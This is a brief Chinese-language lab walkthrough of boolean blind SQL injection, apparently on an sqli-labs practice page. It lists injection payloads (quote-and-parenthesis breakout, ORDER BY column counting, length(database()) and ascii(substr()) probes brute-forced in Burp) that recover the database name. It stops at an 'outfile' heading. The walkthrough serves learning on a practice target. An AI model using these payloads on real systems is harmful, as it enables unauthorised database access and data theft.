1.布尔盲注:
正常回显:You are in.... Use outfile......
报错:You have an error in your SQL syntax
测试注入点:
?id=1'
#报错
?id=1' and 1=1%23
#报错,单引号注入,是字符型
?id=1'))%23
#单引号加了两个括号后正常回显,找到注入点
测试列数:3列
?id=1')) order by 4%23
?id=1')) order by 1%23
?id=1')) order by 3%23
查询库名长度:8位
?id=1%27))%20and%20length(database())=§1§%23
转bp爆破模选择爆破位置,数值类型,0~100
第8次回显:正常
第9次回显:报错
回显从第9位开始报错,说明一共有8位
查询库名:security
?id=1')) and ascii(substr((select database()),1,1))>=1%23
送去爆破
ASCII码=115时回显正常
ASCII码=116时报错
得出数据库的第一个字符的ASCII码是115--->s
接下来修改subtr截取的数据库字符位置依次爆破就能获取完整的数据库名
后续同less5~6
2.outfile:
